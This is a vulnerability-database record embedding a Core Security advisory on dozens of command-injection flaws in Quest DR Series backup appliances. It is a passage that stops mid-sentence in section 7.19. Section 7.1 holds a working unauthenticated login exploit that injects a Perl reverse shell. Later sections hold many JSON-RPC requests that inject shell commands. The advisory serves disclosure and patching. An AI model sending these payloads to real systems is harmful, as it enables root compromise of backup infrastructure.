{"cve": [{"lastseen": "2018-06-09T11:06:29", "references": ["http://packetstormsecurity.com/files/148003/Quest-DR-Series-Disk-Backup-Software-4.0.3-Code-Execution.html", "http://seclists.org/fulldisclosure/2018/May/71", "https://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities"], "description": "Quest DR Series Disk Backup software version before 4.0.3.1 allows command injection (issue 8 of 46).", "edition": 2, "reporter": "NVD", "published": "2018-06-01T21:29:02", "title": "CVE-2018-11150", "type": "cve", "enchantments": {"score": {"modified": "2018-06-09T11:06:29", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11150"], "scanner": [], "modified": "2018-06-08T09:20:49", "cpe": [], "id": "CVE-2018-11150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11150", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-26T10:47:40", "references": ["https://www.synology.com/en-global/support/security/Synology_SA_17_26_Office"], "description": "Command injection vulnerability in Document.php in Synology Office 2.2.0-1502 and 2.2.1-1506 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the crafted file name of RTF documents.", "edition": 2, "reporter": "NVD", "published": "2017-08-14T15:29:01", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CVE-2017-11150", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-11150"], "scanner": [], "cpe": ["cpe:/a:synology:office:2.2.1-1506", "cpe:/a:synology:office:2.2.0-1502"], "modified": "2017-08-25T09:46:59", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11150", "id": "CVE-2017-11150", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-06-01T10:31:26", "references": [], "description": "", "edition": 1, "reporter": "Core Security Technologies", "published": "2018-05-31T00:00:00", "title": "Quest DR Series Disk Backup Software 4.0.3 Code Execution", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-06-01T10:31:26", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11187", "CVE-2018-11186", "CVE-2018-11164", "CVE-2018-11191", "CVE-2018-11193", "CVE-2018-11163", "CVE-2018-11182", "CVE-2018-11176", "CVE-2018-11160", "CVE-2018-11157", "CVE-2018-11162", "CVE-2018-11189", "CVE-2018-11147", "CVE-2018-11179", "CVE-2018-11168", "CVE-2018-11167", "CVE-2018-11161", "CVE-2018-11143", "CVE-2018-11177", "CVE-2018-11178", "CVE-2018-11151", "CVE-2018-11165", "CVE-2018-11181", "CVE-2018-11190", "CVE-2018-11192", "CVE-2018-11174", "CVE-2018-11153", "CVE-2018-11184", "CVE-2018-11170", "CVE-2018-11194", "CVE-2018-11173", "CVE-2018-11156", "CVE-2018-11145", "CVE-2018-11166", "CVE-2018-11155", "CVE-2018-11172", "CVE-2018-11180", "CVE-2018-11171", "CVE-2018-11150", "CVE-2018-11159", "CVE-2018-11148", "CVE-2018-11146", "CVE-2018-11169", "CVE-2018-11149", "CVE-2018-11183", "CVE-2018-11152", "CVE-2018-11158", "CVE-2018-11175", "CVE-2018-11185", "CVE-2018-11154", "CVE-2018-11188", "CVE-2018-11144"], "modified": "2018-05-31T00:00:00", "id": "PACKETSTORM:148003", "href": "https://packetstormsecurity.com/files/148003/Quest-DR-Series-Disk-Backup-Software-4.0.3-Code-Execution.html", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nQuest DR Series Disk Backup Multiple Vulnerabilities \n \n1. *Advisory Information* \n \nTitle: Quest DR Series Disk Backup Multiple Vulnerabilities \nAdvisory ID: CORE-2018-0002 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities \nDate published: 2018-05-31 \nDate of last update: 2018-05-22 \nVendors contacted: Quest Software Inc. \nRelease mode: Forced release \n \n2. *Vulnerability Information* \n \nClass: Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with \nUnnecessary Privileges [CWE-250], Execution with Unnecessary Privileges \n[CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with \nUnnecessary Privileges [CWE-250], Execution with Unnecessary Privileges \n[CWE-250] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: Yes \nCVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146, \nCVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, \nCVE-2018-11151, \nCVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, \nCVE-2018-11156, \nCVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, \nCVE-2018-11161, \nCVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, \nCVE-2018-11166, \nCVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, \nCVE-2018-11171, \nCVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, \nCVE-2018-11176, \nCVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180, \nCVE-2018-11181, \nCVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185, \nCVE-2018-11186, \nCVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190, \nCVE-2018-11191, \nCVE-2018-11192, CVE-2018-11193, CVE-2018-11194 \n \n3. *Vulnerability Description* \n \nQuest's website states that: \n \n\"The Quest DR Series of disk backup appliances [1] are engineered to handle \nhundreds of incoming backup streams with an all-inclusive software solution \nthat simplifies management of backups, giving you more time to focus on \nother tasks. \n \nThe appliances work in conjunction with backup software applications to \nensure data written to disks is protected for reliable recovery. New \nfeatures such as storage groups, secure erase and user management give you \nthe flexibility to tailor utilization policies to fit your organization's \nspecific requirements. \n \nWith Quest DR Series appliances, you can: \n \n- Back up more of your servers and applications - with support for more \nthan 15 backup applications and enhanced security features such as \nencryption at rest and secure erase. \n \n- Store less backup data - using variable block, in-line deduplication \nand compression to lower backup storage requirements by an average of \n20:1 at an average cost of $.05 - $.17/GB. \n \n- Perform better during data ingest and management - with built-in \naccelerators, logical storage groups and support for Fibre Channel \nconnectivity and virtual tape libraries (VTLs).\" \n \nMultiple vulnerabilities were found in the Quest DR Series Disk Backup \nsoftware that would allow remote attackers to execute arbitrary system \ncommands on the appliance with root permissions. \n \nNote: This advisory has limited details on the vulnerabilities because \nduring an attempted coordinated disclosure process for other advisory, \nQuest advised us not to distribute our original findings to the public or \nelse they would take legal action. \nQuest's definition of \"responsible disclosure\" can be found at \nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n \nCoreLabs has been publishing security advisories since 1997 and believes \nin coordinated disclosure and good faith collaboration with software vendors \nbefore disclosure to help ensure that a fix or workaround solution is \nready and available when the vulnerability details are publicized. We \nbelieve that providing technical details about each finding is necessary \nto provide users and organizations with enough information to understand \nthe implications of the vulnerabilities against their environment and, \nmost importantly, to prioritize the remediation activities aiming at \nmitigating risk. \n \nWe regret Quest's posture on disclosure and the lack of a possibility of \nengaging into a coordinated publication date, something we achieve (and \nhave achieved) with many vendors as part of our coordinated disclosure \npractices. \n \n4. *Vulnerable Packages* \n \n. Quest DR Series Disk Backup Software 4.0.3 \nOther products and versions might be affected, but they were not tested. \n \n5. *Vendor Information, Solutions and Workarounds* \n \nQuest has released the build 4.0.3.1 that address the reported \nvulnerabilities. \nBuild can be download at: \n \n. For DR4300e, DR4300, and DR6300: \nhttps://support.quest.com/download-install-detail/6085865 \n. For DR4000, DR4100, DR6000: \nhttps://support.quest.com/download-install-detail/6085802 \n \nFor more details, Quest published the following Release Note: \nhttps://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/ \n \n6. *Credits* \n \nThese vulnerabilities were discovered and researched by Maximiliano \nVidal from Core \nSecurity Consulting Services. The publication of this advisory was \ncoordinated by Leandro Cuozzo from Core Advisories Team. \n \n7. *Technical Description / Proof of Concept Code* \n \nMultiple command injection vulnerabilities were found in the DR \nappliance software, \nwhich provides a web interface to manage system configuration. Clients \nmake use of \nthe site features via its exposed JSON-RPC API. \n \nThe product does only provide SSH access to \nadministrators inside a restricted rbash environment. Administrators are \nable \nto execute a small number of utilities that are mostly replicated in the \nweb console. \n \nWe present the most critical issue in section 7.1, which would allow a \nremote \nunauthenticated attacker to execute arbitrary system commands. \n \nSections 7.2 to 7.46 describe other command injection vectors that \nrequire the attacker \nto have a valid authentication token. \n \nFinally, six privilege escalation vulnerabilities are described from \nsection 7.47 \nto 7.52 that would allow an attacker executing commands as the web \nserver user \nto gain root privileges. Exploiting any of the command injection \nvulnerabilities \nwould grant the attacker the initial foothold from where to escalate to \nroot. \n \n7.1. *Unauthenticated command injection on login* \n \n[CVE-2018-11143] \nThe 'Logon' method is in charge of processing login requests. It is \npossible for an unauthenticated attacker to execute arbitrary commands \nvia the 'Password' parameter. \n \nThe following proof of concept opens a reverse shell connection to \n192.168.1.36 on port 12345 musing Perl. The username must point to an \nexisting account on the system, so we set it to the hardcoded administrator \naccount that ships with the product. \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: text/plain \nContent-Length: 336 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"Logon\", \n\"params\": { \n\"UserName\": \"administrator\", \n\"Password\": \"';perl -e 'use \nSocket;$i=\\\"192.168.1.36\\\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh \n-i\\\");};';echo '\" \n}, \n\"id\": 1 \n} \n-----/ \n \nIf Active Directory support is configured, then the attacker would also \nbe able to inject arbitrary commands into the username field. \n \n7.2. *Command injection in the user update method* \n \n[CVE-2018-11144] \nAn authenticated attacker can craft the values of various user update \nproperties to execute arbitrary commands on the system. \n \nThe following proof of concept injects a 'sleep' command in the 'oldName' \nparameter. \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 158 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"update\", \n\"params\": { \n\"classname\": \"DRUsers\", \n\"user\": { \n\"oldName\": \";sleep 10; echo\", \n\"Name\": \"pepito\", \n\"oldRoles\": [\"PepitoRole\"] \n} \n}, \n\"id\": 1 \n} \n-----/ \n \n7.3. *Command injection in the user delete method* \n \n[CVE-2018-11145] \nAn attacker would be able to inject system commands in the 'user' parameter \npassed to the 'delete' method. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 102 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DRUsers\", \n\"user\": \";sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.4. *Command injection in the set user password method* \n \n[CVE-2018-11146] \nBoth the 'update_pw' and 'setAdminPassword' methods can be abused to \nexecute arbitrary system commands. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 138 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"update_pw\", \n\"params\": { \n\"classname\": \"DRUsers\", \n\"user\": { \n\"Roles\": [\"PepeRole\"], \n\"Name\": \";sleep 10; echo \" \n} \n}, \n\"id\": 1 \n} \n-----/ \n \n7.5. *Command injection in the add_new_container method* \n \n[CVE-2018-11147] \nData backed up to DR Series appliances are handled as virtual shares or \ncontainers. \n \nThe proof of concept injects a 'sleep' command in the 'c_name' parameter \npassed to the vulnerable 'add_new_container' method. \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 142 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"add_new_container\", \n\"params\": { \n\"classname\": \"DRContainers\", \n\"connection_type\": 5, \n\"c_name\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.6. *Command injection in the update_container method* \n \n[CVE-2018-11148] \nThe method in charge of updating containers is also vulnerable to command \ninjection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 141 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"update_container\", \n\"params\": { \n\"classname\": \"DRContainers\", \n\"connection_type\": 5, \n\"c_name\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.7. *Command injection in the setCleaner method* \n \n[CVE-2018-11149] \nThe DR series administrator guide recommends performing scheduled disk \nspace reclamation operations as a method for recovering disk space from \nthe system. The subroutine in charge of setting this schedule was found \nto be vulnerable to command injection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 124 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"setCleaner\", \n\"params\": { \n\"classname\": \"DRSchedules\", \n\"schedules\": [{ \n\"day\": \"; sleep 10; #\" \n}] \n}, \n\"id\": 1 \n} \n-----/ \n \n7.8. *Command injection in the setReplication method* \n \n[CVE-2018-11150] \nThe DR Series system uses an active form of replication that lets you \nconfigure a primary-backup scheme. The subroutine in charge of configuring \nthe replication schedule was found to be vulnerable to command injection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 117 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"setReplication\", \n\"params\": { \n\"classname\": \"DRSchedules\", \n\"container\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.9. *Command injection in the setResetOptions method* \n \n[CVE-2018-11151] \nThe DR series system GUI allows an administrator to configure password \nreset options, which is basically enabling or disabling the 'Forgot your \npassword' link on the logon page. The subroutine that implements this \nfunctionality was found to be vulnerable to command injection via the \n'admin_email' and 'relay_host' request parameters. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 119 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"setResetOptions\", \n\"params\": { \n\"classname\": \"DRPassword\", \n\"admin_email\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.10. *Command injection in the set_compression method* \n \n[CVE-2018-11152] \nThe appliance allows configuring several compression levels for each \nstorage group. The subroutine that sets the level of compression was \nfound to be vulnerable to command injection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 127 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set_compression\", \n\"params\": { \n\"classname\": \"DRCompression\", \n\"compressionLevel\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.11. *Command injection in the license delete method* \n \n[CVE-2018-11153] \nThe JSON-RPC API exposes several methods to operate with system licenses, \nseveral of which are vulnerable to command injection issues. The 'delete' \nsubroutine can be exploited by crafting the value of the 'serviceTag' \nrequest parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 108 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DRLicense\", \n\"serviceTag\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.12. *Command injection in the registerDR2000v method* \n \n[CVE-2018-11154] \nThe 'registerDR2000v' method is part of the licensing system. This \nsubroutine is vulnerable to command injection via the 'LicenseServer', \n'AdminName', 'Email', 'CompanyName' and 'Comments' request parameters. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 133 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"registerDR2000v\", \n\"params\": { \n\"classname\": \"DRLicense\", \n\"dr2000v\": { \n\"LicenseServer\": \"; sleep 10; #\" \n} \n}, \n\"id\": 1 \n} \n-----/ \n \n7.13. *Command injection in the updateRegisterDR2000v method* \n \n[CVE-2018-11155] \nThe 'updateRegisterDR2000v' subroutine is yet another vulnerable method \noffered by the license management API. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 139 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"updateRegisterDR2000v\", \n\"params\": { \n\"classname\": \"DRLicense\", \n\"dr2000v\": { \n\"LicenseServer\": \"; sleep 10; #\" \n} \n}, \n\"id\": 1 \n} \n \n-----/ \n7.14. *Command injection in the email relay host update method* \n \n[CVE-2018-11156] \nThe appliance can be configured to use an external mail server for sending \nemail alerts. The subroutine implementing this functionality was found to \nbe vulnerable to command injection via the 'hostname' request parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 114 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"update\", \n\"params\": { \n\"classname\": \"DREmailRelayHost\", \n\"hostname\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.15. *Command injection in the join domain method* \n \n[CVE-2018-11157] \nA DR series system can be joined to a Microsoft Active Directory Services \ndomain. This functionality is exposed by the 'ActiveDirectoryService' \nmodule. \nAn attacker can inject system commands in the 'domain' parameter passed to \nthe 'join' method. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 152 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"join\", \n\"params\": { \n\"classname\": \"DRActiveDirectory\", \n\"username\": \"pepe\", \n\"password\": \"pepito\", \n\"domain\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.16. *Command injection in the add storage method* \n \n[CVE-2018-11158] \nThe storage service module offers support for managing storage devices. \nThe 'add' method was found to be vulnerable. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 106 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"add\", \n\"params\": { \n\"classname\": \"DRStorage\", \n\"service_tag\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.17. *Command injection in the get_storage_group_statistics method* \n \n[CVE-2018-11159] \nThe application provides usage statistics for each storage group, such \nas capacity used, compression status, inode count, etc. In particular, \nthe 'group' parameter passed to the 'get_storage_group_statistics' is not \nsanitized, allowing system commands to be injected. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 130 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"get_storage_group_statistics\", \n\"params\": { \n\"classname\": \"DRStorageGroup\", \n\"group\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.18. *Command injection in the create storage group method* \n \n[CVE-2018-11160] \nThe subroutine that allows adding a new storage group was found to be \nvulnerable to command injection. An attacker can inject system commands \non various request parameters, such as 'Compression_mode' and 'passphrase'. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 130 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"create\", \n\"params\": { \n\"classname\": \"DRStorageGroup\", \n\"group\": { \n\"Compression_mode\": \"; sleep 10; #\" \n} \n}, \n\"id\": 1 \n} \n-----/ \n \n \n7.19. *Command injection in the delete storage group method* \n \n[CVE-2018-11161] \nThe 'delete' subroutine in the 'StorageGroupService' module passes user \ngenerated input to 